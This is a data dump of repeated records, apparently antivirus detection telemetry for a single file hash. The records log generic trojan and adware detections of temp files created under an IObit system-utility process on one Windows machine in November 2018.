  Row(detection=Row(filename='tmp002380c6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002380c6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:17:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028fb0f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028fb0f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:20:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295ed2', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295ed2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:13:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297661', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297661', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:47:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b29b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b29b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:11:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b1da', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b1da', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:11:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296224', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296224', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:18:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002915e8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002915e8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:51:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291a5f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291a5f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:57:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291ae0', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291ae0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:57:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a5a7', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a5a7', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:58:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a63c', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a63c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:58:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a614', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a614', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297b74', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297b74', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:55:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296ad5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296ad5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:31:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292f0e', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292f0e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:20:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292f05', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292f05', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:20:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297ad5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297ad5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:54:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296ace', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296ace', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:31:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292f18', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292f18', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:20:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029085f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029085f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:35:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002922e9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002922e9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:06:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292219', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292219', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:06:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296f21', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296f21', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:37:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029086c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029086c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:35:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296f7d', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296f7d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:37:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291624', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291624', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:51:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002915cc', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002915cc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:51:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029110b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029110b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:45:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294c82', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294c82', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:48:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291550', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291550', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:50:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292bac', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292bac', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:17:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023886e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023886e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:26:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294ccf', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294ccf', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:48:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023aab4', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023aab4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:03:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a4df', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a4df', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:57:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a89a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a89a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:01:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e836', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e836', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:02:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291fee', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291fee', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:03:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296261', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296261', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:19:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b54e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b54e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:14:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dff6', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dff6', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:55:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e044', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e044', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:55:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b49a', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b49a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:14:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294c9c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294c9c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:48:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238b6b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238b6b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:29:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023df9d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023df9d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:55:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091645-1884a099', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091645-1884A099', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:16:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002942cd', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002942cd', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:37:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292dbf', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292dbf', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:19:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023919e', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023919e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:36:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dbc0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dbc0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:51:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092931-7eefb598', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-092931-7EEFB598', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:29:03Z'), dt=datetime.date(2018, 11, 4)),
